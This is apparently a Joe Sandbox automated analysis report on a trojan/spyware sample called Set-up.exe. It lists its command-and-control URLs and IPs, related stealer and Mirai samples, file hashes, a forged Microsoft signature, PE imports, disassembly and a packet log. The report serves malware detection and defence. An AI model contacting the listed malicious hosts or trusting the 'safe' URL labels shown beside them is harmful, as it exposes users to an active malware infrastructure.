http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467fd4	Set-up.exe, 00000000.00000002.2343286882.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341075719.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341194801.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2340945247.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.jpg	Set-up.exe	false		high
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ67	Set-up.exe	false	Avira URL Cloud: safe	unknown
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467963	Set-up.exe, 00000000.00000002.2343286882.00000000015E2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341075719.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2341194801.00000000015DC000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2340945247.00000000015D5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://home.thirttj13vs.top/KQOoGKPKGzBeuSFZKvBJ1736042467http://home.thirttj13vs.top/KQOoGKPKGzBeuS	Set-up.exe, 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.147.147.173	home.thirttj13vs.top	United States		2686	ATGS-MMD-ASUS	true
50.19.58.113	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584505
Start date and time:	2025-01-05 17:55:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal88.troj.spyw.evad.winEXE@1/0@9/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 54 Number of non-executed functions: 154
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.147.147.173	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	random(5).exe	Get hash	malicious	Cryptbot	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	Set-up.exe	Get hash	malicious	Unknown	Browse	home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
	Set-up.exe	Get hash	malicious	Unknown	Browse	home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
httpbin.org	ebjtOH70jl.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	34.197.122.172
	random(3).exe	Get hash	malicious	Cryptbot	Browse	34.200.57.114
	random(5).exe	Get hash	malicious	Cryptbot	Browse	34.200.57.114
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Prs9eAnu2k.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	34.200.57.114

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	54.60.167.108
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	54.140.246.99
	momo.mips.elf	Get hash	malicious	Mirai	Browse	18.214.158.12
	momo.arm7.elf	Get hash	malicious	Mirai	Browse	23.21.46.189
	z0r0.spc.elf	Get hash	malicious	Mirai	Browse	52.3.142.233
	armv6l.elf	Get hash	malicious	Unknown	Browse	34.198.216.220
	armv5l.elf	Get hash	malicious	Unknown	Browse	54.146.100.226
	armv6l.elf	Get hash	malicious	Unknown	Browse	52.73.147.212
	4.elf	Get hash	malicious	Unknown	Browse	54.42.40.48
	2.elf	Get hash	malicious	Unknown	Browse	52.0.112.74
ATGS-MMD-ASUS	cZO.exe	Get hash	malicious	Unknown	Browse	57.128.196.4
	Fantazy.spc.elf	Get hash	malicious	Unknown	Browse	32.108.110.16
	Fantazy.x86.elf	Get hash	malicious	Unknown	Browse	32.167.24.91
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	48.232.188.207
	Fantazy.i686.elf	Get hash	malicious	Unknown	Browse	51.2.229.158
	Fantazy.arm7.elf	Get hash	malicious	Mirai	Browse	48.42.126.167
	momo.mpsl.elf	Get hash	malicious	Mirai	Browse	57.229.27.66
	momo.arm7.elf	Get hash	malicious	Mirai	Browse	51.80.11.196
	armv7l.elf	Get hash	malicious	Unknown	Browse	32.165.250.60
	z0r0.m68k.elf	Get hash	malicious	Mirai	Browse	32.64.215.247

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	5.794818581691391
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	8'022'664 bytes
MD5:	91db00ccdef85a8ae22ee3b8df68eca9
SHA1:	749612cd854e4bc49cef5e951e16f6a6a673fd3f
SHA256:	1d262da9a65b11f2c58e05bb92129dc9b7042366d2cdb5990b158927b3b47ef0
SHA512:	dbda500803b260519379e16d16a06772f17742b18ad4cc22d9c243d9ad689ad52726c8850494dee9b2f9cec1727bc80d31299a387648716ee4fad4c39db87521
SSDEEP:	49152:JR5WWMaX0CsDB0d2CED/iXNNrNW6c54XSJB5i3OU2lXpQaW3hbiv88Kwb2ZPyz8p:JR8QEB0Si95JcOST5mOPXpYIKByz8p
TLSH:	4A861956FA8781F5D58305725056B33FAE30AF009925CEB7CFD1FB28D672A12A91E318
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....yg...............(..K..`z..2...........0K...@...........................z......^{...@... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6779E9CA [Sun Jan 5 02:09:14 2025 UTC]
TLS Callbacks:	0x7890e0, 0x789090
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	51b39aff649af7abc30a06f2362db069

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US
Signature Validation Error:	A certificate chain could not be built to a trusted root authority
Error Number:	-2146762486
Not Before, Not After	26/08/2024 18:01:06 21/08/2025 18:01:06
Subject Chain	CN=www.microsoft.com, O=Microsoft Corporation, L=Redmond, S=WA, C=US
Version:	3
Thumbprint MD5:	312C68C1E10D7605EDDCD3EF30129422
Thumbprint SHA-1:	B19F9EF62E0FDCDF923C0C6CFCBBCD25E3E6C827
Thumbprint SHA-256:	6592D56F166BB363FD5A72AEA3E74FEC5378D5655E4150D8D53DC3FA47861494
Serial:	33009F7B734DB0480411EB0BBA0000009F7B73

Entrypoint Preview

Instruction
mov dword ptr [00B73658h], 00000001h
jmp 00007F27ED61AE36h
nop
mov dword ptr [00B73658h], 00000000h
jmp 00007F27ED61AE26h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F27ED9A2696h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00A1A000h
call dword ptr [00B759A8h]
sub esp, 04h
test eax, eax
je 00007F27ED61B1F5h
mov ebx, eax
mov dword ptr [esp], 00A1A000h
call dword ptr [00B75A1Ch]
mov edi, dword ptr [00B759BCh]
sub esp, 04h
mov dword ptr [00B71028h], eax
mov dword ptr [esp+04h], 00A1A013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00A1A029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [008B3004h], eax
test esi, esi
je 00007F27ED61B193h
mov dword ptr [esp+04h], 00B7102Ch
mov dword ptr [esp], 00B6C104h
call esi
mov dword ptr [esp], 00401580h
call 00007F27ED61B0E3h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x775000	0x2dac	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x7a6400	0x688	.reloc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x77a000	0x346b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x761a60	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x775814	0x620	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4b120c	0x4b1400	9d3794795338171eb9504fea272a5ac9	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x4b3000	0x166924	0x166a00	93030f515e09e90003776a9d72af41b4	False	0.017204383060299755	dBase III DBT, version number 0, next free block index 10, 1st item "\240\315y"	0.2644276517955815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x61a000	0x151898	0x151a00	51fbcef7480ad4c7e6c88153c3f1719c	False	0.42069994330803406	data	6.2762648741700735	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x76c000	0x4d64	0x4e00	1893fd783655308196093caef1552443	False	0.32046274038461536	data	4.921159802159051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x771000	0x3180	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x775000	0x2dac	0x2e00	814c51778b634965694354df736816bb	False	0.36795176630434784	data	5.29971488937372	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x778000	0x30	0x200	fe2a65d4187b984679c52ae93485940e	False	0.0625	data	0.2233456448570176	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x779000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x77a000	0x346b8	0x34800	459fc11e68ea2c936e219c2483c3ea21	False	0.49849330357142857	data	6.653492432154417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDestroyHash, CryptDestroyKey, CryptEnumProvidersW, CryptExportKey, CryptGenRandom, CryptGetHashParam, CryptGetProvParam, CryptGetUserKey, CryptHashData, CryptReleaseContext, CryptSetHashParam, CryptSignHashW, DeregisterEventSource, RegCloseKey, RegEnumKeyExA, RegNotifyChangeKeyValue, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegisterEventSourceW, ReportEventW, SystemFunction036
bcrypt.dll	BCryptGenRandom
CRYPT32.dll	CertCloseStore, CertDuplicateCertificateContext, CertEnumCertificatesInStore, CertFindCertificateInStore, CertFreeCertificateContext, CertGetCertificateContextProperty, CertGetEnhancedKeyUsage, CertGetIntendedKeyUsage, CertOpenStore, CertOpenSystemStoreA, CertOpenSystemStoreW
GDI32.dll	BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDeviceCaps, SelectObject
gdiplus.dll	GdipGetImageEncoders, GdipGetImageEncodersSize, GdiplusShutdown, GdiplusStartup
IPHLPAPI.DLL	ConvertInterfaceIndexToLuid, ConvertInterfaceLuidToNameA, FreeMibTable, GetAdaptersAddresses, GetBestRoute2, GetUnicastIpAddressTable, if_indextoname, if_nametoindex
KERNEL32.dll	AcquireSRWLockExclusive, CancelIo, CloseHandle, CompareFileTime, ConvertFiberToThread, ConvertThreadToFiberEx, CreateEventA, CreateFiberEx, CreateFileA, CreateFileMappingA, CreateIoCompletionPort, CreateMutexA, CreateSemaphoreW, CreateThread, CreateToolhelp32Snapshot, DeleteCriticalSection, DeleteFiber, EnterCriticalSection, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileW, FormatMessageW, FreeLibrary, GetACP, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceExA, GetDriveTypeA, GetEnvironmentVariableA, GetEnvironmentVariableW, GetFileAttributesA, GetFileType, GetLastError, GetLogicalDriveStringsA, GetModuleFileNameA, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOverlappedResult, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetThreadLocale, GetTickCount64, GetTickCount, GetTimeZoneInformation, GetVersion, GetVersionExA, GlobalMemoryStatusEx, HeapAlloc, HeapFree, InitializeConditionVariable, InitializeCriticalSection, IsBadReadPtr, IsDBCSLeadByteEx, K32EnumProcesses, LeaveCriticalSection, LoadLibraryA, LoadLibraryW, MapViewOfFile, MoveFileExA, MultiByteToWideChar, OpenProcess, PeekNamedPipe, PostQueuedCompletionStatus, Process32First, Process32Next, QueryFullProcessImageNameA, QueryPerformanceCounter, QueryPerformanceFrequency, ReadConsoleA, ReadConsoleW, ReadFile, RegisterWaitForSingleObject, ReleaseSRWLockExclusive, ReleaseSemaphore, SetConsoleMode, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetUnhandledExceptionFilter, Sleep, SleepConditionVariableCS, SleepEx, SwitchToFiber, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TlsSetValue, UnmapViewOfFile, UnregisterWait, VerSetConditionMask, VerifyVersionInfoW, VirtualAlloc, VirtualFree, VirtualLock, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitNamedPipeA, WakeAllConditionVariable, WakeConditionVariable, WideCharToMultiByte, WriteFile, lstrlenA
msvcrt.dll	__mb_cur_max, __setusermatherr, _findclose, _fullpath, _lock, _strnicmp, _unlock, getc, islower, isxdigit, localeconv, ungetc, vfprintf, _findnext, _findfirst, _open
ole32.dll	CreateStreamOnHGlobal
SHELL32.dll	SHGetKnownFolderPath
api-ms-win-crt-convert-l1-1-0.dll	atoi, mbstowcs, strtol, strtoll, strtoul, wcstombs
api-ms-win-crt-environment-l1-1-0.dll	__p__environ, __p__wenviron, getenv
api-ms-win-crt-filesystem-l1-1-0.dll	_fstat64, _stat64, _unlink
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, calloc, free, malloc, realloc
api-ms-win-crt-locale-l1-1-0.dll	setlocale
api-ms-win-crt-math-l1-1-0.dll	_fdopen
api-ms-win-crt-private-l1-1-0.dll	memchr, memcmp, memcpy, memmove, strchr, strrchr, strstr, wcsstr
api-ms-win-crt-runtime-l1-1-0.dll	_set_app_type, __p___argc, __p___argv, __p___wargv, __p__acmdln, __sys_errlist, __sys_nerr, _assert, _cexit, _configure_narrow_argv, _configure_wide_argv, _crt_at_quick_exit, _crt_atexit, _errno, _exit, _fpreset, _initialize_narrow_environment, _initialize_wide_environment, _initterm, _set_invalid_parameter_handler, abort, exit, raise, signal, strerror
api-ms-win-crt-stdio-l1-1-0.dll	__acrt_iob_func, __p__commode, __p__fmode, __stdio_common_vfwprintf, __stdio_common_vsprintf, __stdio_common_vsscanf, __stdio_common_vswprintf, _fileno, _fseeki64, _lseeki64, _wfopen, _write, fclose, feof, ferror, fflush, fgets, fopen, fputc, fputs, fread, fseek, ftell, fwrite, rewind, setvbuf, _write, _setmode, _read, _open, _fileno, _close
api-ms-win-crt-string-l1-1-0.dll	_strlwr_s, isspace, isupper, memset, strcat, strcmp, strcpy, strcspn, strlen, strncat, strncmp, strncpy, strpbrk, strspn, tolower, wcscat, wcscmp, wcscpy, wcslen, _wcsnicmp, _stricmp, _strdup, _strdup
api-ms-win-crt-time-l1-1-0.dll	__daylight, __timezone, __tzname, _difftime32, _difftime64, _gmtime64, _mktime64, _time32, _time64, _tzset, strftime
api-ms-win-crt-utility-l1-1-0.dll	_byteswap_uint64, bsearch, qsort, rand, srand
USER32.dll	CharUpperA, EnumDisplayMonitors, EnumWindows, FindWindowA, GetDC, GetProcessWindowStation, GetSystemMetrics, GetUserObjectInformationW, GetWindowTextA, MessageBoxW, ReleaseDC, SendMessageA
WS2_32.dll	WSACleanup, WSACloseEvent, WSACreateEvent, WSAEnumNetworkEvents, WSAEventSelect, WSAGetLastError, WSAIoctl, WSAResetEvent, WSASetEvent, WSASetLastError, WSAStartup, WSAStringToAddressW, WSAWaitForMultipleEvents, __WSAFDIsSet, accept, bind, closesocket, connect, gethostbyaddr, gethostbyname, gethostname, getpeername, getservbyname, getservbyport, getsockname, getsockopt, htonl, htons, inet_addr, inet_ntoa, ioctlsocket, listen, ntohl, ntohs, recv, recvfrom, select, send, sendto, setsockopt, shutdown, socket

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 17:55:58.865427017 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:58.865456104 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:55:58.865533113 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:58.869179010 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:58.869189024 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:55:59.531740904 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:55:59.532218933 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:59.532243967 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:55:59.533631086 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:55:59.533787012 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:59.534954071 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:59.535021067 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:55:59.541124105 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:59.541131020 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:55:59.585819960 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:59.931303978 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:55:59.931421995 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:55:59.931492090 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:59.932487011 CET	49709	443	192.168.2.6	50.19.58.113
Jan 5, 2025 17:55:59.932506084 CET	443	49709	50.19.58.113	192.168.2.6
Jan 5, 2025 17:56:14.767074108 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.772171021 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.772277117 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.773277044 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.778141022 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778162003 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778212070 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778222084 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778244972 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.778259039 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778269053 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778310061 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.778331041 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.778343916 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778352976 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778433084 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.778480053 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778489113 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.778598070 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.783071041 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.783091068 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.783098936 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.783171892 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.783190012 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.783199072 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.783214092 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.783329010 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.825896025 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.826034069 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.873889923 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.874011993 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.921843052 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.922100067 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:14.973879099 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:14.973954916 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.021871090 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.021962881 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.069869041 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.069950104 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.121824980 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.122118950 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.173912048 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.174010992 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.212201118 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.212311029 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217226982 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217238903 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217313051 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217513084 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217538118 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217571020 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217581034 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217586994 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217592955 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217613935 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217637062 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217637062 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217659950 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217688084 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217698097 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217705011 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217768908 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217778921 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217796087 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217822075 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217833042 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217845917 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217874050 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217883110 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217891932 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217910051 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217931032 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217938900 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217948914 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217950106 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.217993975 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.217998028 CET	49759	80	192.168.2.6	34.147.147.173
Jan 5, 2025 17:56:15.218034983 CET	80	49759	34.147.147.173	192.168.2.6
Jan 5, 2025 17:56:15.218198061 CET	80	49759	34.147.147.173	192.168.2.6
